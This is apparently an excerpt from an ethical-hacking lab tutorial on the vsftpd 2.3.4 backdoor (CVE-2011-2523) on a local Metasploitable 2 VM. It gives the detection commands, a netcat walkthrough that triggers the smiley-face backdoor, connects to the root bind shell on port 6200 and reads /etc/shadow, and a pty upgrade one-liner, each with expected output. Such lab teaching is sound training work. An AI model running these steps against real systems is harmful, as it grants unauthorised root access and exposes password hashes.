Metasploitable vsftpd Backdoor Lab — CVE-2011-2523 Exploit Guide

📰 Originally published on Securityelites — AI Red Team Education — the canonical, fully-updated version of this article.

🧪 METASPLOITABLE LAB SERIESFREE

Part of the Metasploitable Lab Series

Lab 5 of 30 · 16% complete

⚠️ Lab Environment Only. Metasploitable vsftpd Backdoor Lab – vsftpd 2.3.4 exploitation targets your local Metasploitable 2 VM only. Never test against systems you don’t own.

✅ Before You Start

• Lab 4 — First Metasploit Module — running your first MSF exploit. This lab introduces the vsftpd backdoor — one of the most famous Metasploitable vulnerabilities and the classic first manually exploitable service.
• Metasploitable 2 VM running · Kali Linux · nmap · netcat · msfconsole installed · Both VMs on same host-only network segment

The vsftpd 2.3.4 backdoor is the vulnerability that appears in almost every beginner Metasploitable walkthrough — and for good reason. I use it in every introductory lab because it demonstrates three distinct security concepts simultaneously: supply chain attack mechanics, triggered backdoor behaviour, and non-standard port exploitation patterns. It’s one of the clearest examples of a supply chain attack in open-source software history: an attacker compromised the vsftpd project’s source code distribution server in 2011 and inserted a backdoor that opens a root shell on port 6200 whenever a username containing a smiley face “:)” is submitted. Understanding this vulnerability teaches three things simultaneously: how supply chain attacks work, how a triggered backdoor differs from a direct service exploit, and how to identify and exploit non-standard ports opened by malware.

🎯 Lab 5 Objectives

Identify vsftpd 2.3.4 on Metasploitable via Nmap version detection
Understand the backdoor trigger mechanism (smiley face username)
Exploit manually using netcat — no Metasploit needed
Exploit via Metasploit module for comparison
Verify root access and document the finding

⏱️ 25 min · 3 terminal exercises ### 📋 Hacking Lab 35 — Metasploitable vsftpd Backdoor Lab 1. Vulnerability Background — CVE-2011-2523 2. Detection — Nmap and Banner Grabbing 3. Manual Exploitation via Netcat 4. Metasploit Module Exploitation 5. Post-Exploitation and Remediation The vsftpd backdoor is a classic example of a supply chain attack. The full Metasploitable lab series continues with Lab 6 — Samba exploitation. Check open ports first with the Port Scanner Tool.

Vulnerability Background — CVE-2011-2523

In June 2011, the vsftpd 2.3.4 source code package distributed from the project’s official site was compromised. An attacker had replaced the legitimate source archive with a version containing a backdoor. The backdoor code: when a user logs in with a username ending in the string “:)” (a smiley face), vsftpd opens a bind shell on port 6200 with root privileges. The user never needs to authenticate — triggering the backdoor only requires connecting to port 21 and sending the poisoned username. The legitimate vsftpd 2.3.4 had no such code; only the trojaned package distributed for a period from the official download server contained the backdoor.

THE BACKDOOR CODE (SIMPLIFIED)Copy

What the backdoor does (conceptually)

if username.endswith(“:)”): # smiley face trigger
bind_port = 6200 # open listener on 6200
spawn_shell(“/bin/sh”, uid=0) # root shell, no auth required

Attack flow

1. Attacker connects to port 21 (FTP)
2. Sends: USER anything:) ← smiley triggers backdoor
3. vsftpd opens port 6200 with root shell
4. Attacker connects to port 6200 → root shell, no password

Why it’s significant

Supply chain attack: legitimate software distribution channel poisoned
No authentication required: trigger + connect = root
Invisible to most AV: installed as part of “legitimate” software package

Detection — Nmap and Banner Grabbing

EXERCISE 1 — DETECT vsftpd 2.3.4Copy

Step 1: Confirm FTP service version

nmap -sV -p 21 192.168.56.101

Expected output:

21/tcp open ftp vsftpd 2.3.4
Service Info: Unix

Step 2: Run NSE script — confirms backdoor explicitly

nmap –script ftp-vsftpd-backdoor -p 21 192.168.56.101

Expected output:

| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2011-2523
|_ Backdoor listening on port 6200/tcp

Step 3: Banner grab with netcat

nc 192.168.56.101 21

Expected: 220 (vsFTPd 2.3.4)

Step 4: Searchsploit

searchsploit vsftpd 2.3.4

Shows: Unix/Remote vsftpd 2.3.4 – Backdoor Command Execution

My Approach — Why I Banner Grab Before Running NSE: I always manually netcat to port 21 before running the NSE script. If the banner shows “220 (vsFTPd 2.3.4)” I already know it’s vulnerable — the NSE script just confirms it formally for the report. My workflow: banner grab first (10 seconds), searchsploit confirm (10 seconds), then exploit. I’ve found that automated scripts sometimes fail on rate-limited services where manual netcat always works.

Manual Exploitation via Netcat

The manual exploit requires only netcat — no frameworks. This is the technique that demonstrates understanding of what the vulnerability actually does, rather than just running a module blindly.

EXERCISE 2 — MANUAL EXPLOIT WITH NETCATCopy

Terminal 1: Trigger the backdoor via FTP

nc 192.168.56.101 21

You see: 220 (vsFTPd 2.3.4)

USER backdoor:)

Response: 331 Please specify the password.

PASS anything

Port 6200 now open — backdoor triggered

Terminal 2: Connect to the backdoor shell

nc 192.168.56.101 6200

Blank line = shell waiting for commands

id

Expected: uid=0(root) gid=0(root)

hostname

Expected: metasploitable

cat /etc/shadow | head -3

Expected: root password hash — full root access confirmed

Upgrade to interactive shell

python -c ‘import pty; pty.spawn(“/bin/bash”)’
root@metasploitable:/#

securityelites.com

Terminal 1 — Trigger (Port 21) | Terminal 2 — Shell (Port 6200)

TERMINAL 1 — FTP Trigger
$ nc 192.168.56.101 21
220 (vsFTPd 2.3.4)
USER backdoor:)
331 Please specify the password.
PASS anything
[hangs — backdoor triggered]

TERMINAL 2 — Root Shell
$ nc 192.168.56.101 6200
id
uid=0(root) gid=0(root)
hostname
metasploitable
cat /etc/shadow | head -2
root:$1$bku4… ← hash

---

📖 Read the complete guide on Securityelites — AI Red Team Education

This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on Securityelites — AI Red Team Education →

---

This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit Securityelites — AI Red Team Education.